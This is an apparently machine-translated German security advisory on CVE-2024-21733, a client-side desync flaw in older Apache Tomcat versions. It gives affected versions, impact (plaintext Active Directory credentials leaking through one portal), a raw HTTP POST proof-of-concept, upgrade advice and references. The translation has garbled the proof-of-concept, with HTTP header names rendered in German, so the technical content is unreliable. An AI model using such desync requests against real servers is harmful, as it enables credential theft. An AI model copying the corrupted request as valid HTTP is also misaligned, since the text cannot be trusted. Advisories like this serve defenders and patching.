CVE-2024-21733 Apache Tomcat HTTP-Anfrage Sicherheitslücke mit hohem Risiko der Offenlegung von Informationen

Apache Tomcat 9.0.0-M11 bis 9.0.43 Apache Tomcat 8.5.7 bis 8.5.63 CVE-2024-21733 Risiko der Offenlegung von Informationen durch Apache Tomcat

Beschreibungen

Apache Tomcat® ist eine quelloffene Implementierung von Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations und Jakarta Authentication Specification. Spezifikation für die Authentifizierung.

Apache Tomcat von 8.5.7 bis 8.5.63 und von 9.0.0-M11 bis 9.0.43 ist anfällig für clientseitige Desynchronisationsangriffe (CSD).

beeinflussen (in der Regel nachteilig)

Eine Sicherheitslücke im Zusammenhang mit der clientseitigen De-Synchronisierung (CSD) tritt auf, wenn ein Webserver nicht in der Lage ist, die Länge des Inhalts einer POST-Anforderung genau zu verarbeiten. Durch dieses Problem kann ein Angreifer den Browser des Opfers so manipulieren, dass er die Verbindung zur Website falsch abbricht. Diese Manipulation kann zu einer unbefugten Extraktion sensibler Daten aus Server- und Client-Verbindungen führen.

Der Schweregrad der Auswirkungen hängt von der Anwendung ab, die Tomcat als Back-End-Webserver verwendet und möglicherweise vertrauliche Informationen wie Klartext-Anmeldedaten preisgibt. So fand unser Team beispielsweise einen Fall in einer Version des ADSelfService Plus-Portals von ManageEngine vor Version 6304, bei dem es möglich war, Active Directory-Anmeldedaten im Klartext von einer Client-Verbindung zu erhalten, wie unten dargestellt.

PoC/Exploit

POST / HTTP/1.1
Host: Hostname
Sec-Ch-Ua: "Chrom";v="119″, "Not?A_Brand";v="24″
Sec-Ch-Ua-Mobil: ?0
Sec-Ch-Ua-Plattform: "Linux"
Upgrade-Insecure-Anfragen: 1
Benutzer-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/119.0.6045.159 Safari/537.36
Akzeptiert: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Sec-Fetch-Site: keine
Sec-Fetch-Mode: navigieren
Sec-Fetch-Benutzer: ?1
Sec-Fetch-Dest: Dokument
Akzeptanz-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priorität: u=0, i
Verbindung: keep-alive
Inhalt-Länge: 6
Inhalt-Typ: anwendung/x-www-form-urlencoded
X

CVE-2024-21733 Apache Tomcat HTTP-Anfrage Sicherheitslücke mit hohem Risiko der Offenlegung von Informationen

Verschreibung

Benutzer der betroffenen Versionen sollten eine der folgenden Abhilfemaßnahmen ergreifen:
Aufrüstung auf Apache Tomcat 9.0.44 oder höher
Aufrüstung auf Apache Tomcat 8.5.64 oder höher
Quelle: xer0dayz von Sn1perSecurity LLC meldete diese Schwachstelle an das Tomcat-Sicherheitsteam.

Historie: 2024-01-19 Ursprüngliche Mitteilung

Vollständiges Sicherheitsbulletin: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz

bibliographie

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733

https://tomcat.apache.org/security-9.html

https://tomcat.apache.org/security-8.html

https://portswigger.net/research/browser-powered-desync-attacks

https://hackerone.com/reports/2327341

Originalartikel von Chief Security Officer, bei Vervielfältigung bitte angeben: https://cncso.com/de/cve-2024-21733-apache-tomcat-http-request-smuggling-html

Wie (1)
Vorherige Freitag, 10. August 2024 um 8:45 Uhr.
Weiter Freitag, 14. August 2024 um 8:07 Uhr